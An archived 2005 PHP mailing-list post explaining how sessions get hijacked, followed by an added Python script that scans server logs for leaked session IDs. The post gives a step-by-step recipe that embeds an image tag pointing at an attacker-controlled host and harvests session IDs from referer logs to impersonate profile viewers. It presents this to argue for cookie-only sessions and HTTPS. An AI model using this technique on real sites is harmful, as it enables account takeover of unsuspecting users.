[nycphp-talk] Session basics

Rolan Yang rolan at omnistep.com
Thu Aug 11 01:40:33 EDT 2005


One way to hijack a session is to hack in, compromise a machine on the 
network and run a sniffer. Most hackers are not running sniffers to 
hijack sessions though. They sniff to grab login/passwords from 
pop/imap/smtp/ftp/telnet. Requiring SSL/TLS protects you from this attack.

Another way to hijack sessions is to find websites that still append the 
session data to the url and links. The *friendfinder.com sites and 
several others, which I shall not mention, maintain sessions like that. 
I believe if you disable cookies in your browser, PHP reverts to url 
based sessions*.

Ok, so here's basically how it works: You find a php website which uses 
session cookies and allows you to post messages/stuff (e.g. your dating 
profile). In your dating profile, you include some stuff about yourself 
"bla bla bla"... then add <img src="http://yourownwebsite.com/blankpixel.gif">

Then sit back and wait.

Every now and then, grep your web server logs for "blankpixel.gif". The 
referer field in the log will list the referring url... which contains 
the appended session cookie. At this point, you can just copy+paste the 
referer url into your browser, click "GO" and assume the identity of the 
person who viewed your dating profile. For this reason, passing session 
IDs via GET requests is extremely dangerous.

* The safest thing to do is to enable "session.use_only_cookies" and require 
that clients have cookies enabled.... and use https

~Rolan

Brian O'Connor wrote:

> I don't use cookies for that.  I use $_SESSION['userID'], 
> $_SESSION['user'], $_SESSION['pass'].
>
> I understand the concept of sessions, I don't understand the concept 
> of hijacking them, and making a system to prevent hijacking them.
>
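
As an added defender-side example (not code from Rolan's post or from the list): a small Python script that scans combined-format web server logs for the leak described above, i.e. session IDs turning up in a request URL or in the Referer header. The log lines, hostnames and session ID are constructed; the extra parameter names checked besides PHPSESSID are an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Aug/2005:01:40:33 -0400] "GET /profile.php?id=42&PHPSESSID=9f1c0f2a3b4d5e6f7a8b9c0d1e2f3a4b HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Aug/2005:01:40:35 -0400] "GET /blankpixel.gif HTTP/1.1" 200 43 "http://dating.example/view.php?who=7&PHPSESSID=9f1c0f2a3b4d5e6f7a8b9c0d1e2f3a4b" "Mozilla/5.0"
198.51.100.9 - - [11/Aug/2005:01:41:02 -0400] "GET /index.php HTTP/1.1" 200 2048 "http://dating.example/" "Mozilla/5.0"
"""

# One combined-format line: client, identd, user, timestamp, request, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# PHPSESSID is PHP's default; the other names are assumed application-specific parameters.
SESSION_PARAMS = {"PHPSESSID", "sid", "session_id"}


def session_ids_in_url(url):
    """Return the set of session-id values carried in the query string of a URL."""
    qs = parse_qs(urlsplit(url).query)
    return {v for k, vals in qs.items() if k in SESSION_PARAMS for v in vals}


def find_leaks(log_text):
    """Return (line_no, where, session_id) for every request whose own URL or whose
    Referer carries a session id. 'request-url' means this site is emitting session
    ids in links (e.g. URL-based sessions); 'referer' means a page that linked here
    had one in its URL, exactly the field the attack above harvests."""
    leaks = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for sid in session_ids_in_url(m["path"]):
            leaks.append((n, "request-url", sid))
        if m["referer"] != "-":
            for sid in session_ids_in_url(m["referer"]):
                leaks.append((n, "referer", sid))
    return leaks


if __name__ == "__main__":
    for n, where, sid in find_leaks(SAMPLE_LOG):
        print(f"line {n}: session id in {where}: {sid[:8]}...")
```

Any hit is a sign that session.use_only_cookies is off somewhere, or that an application is building links with the session id by hand.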
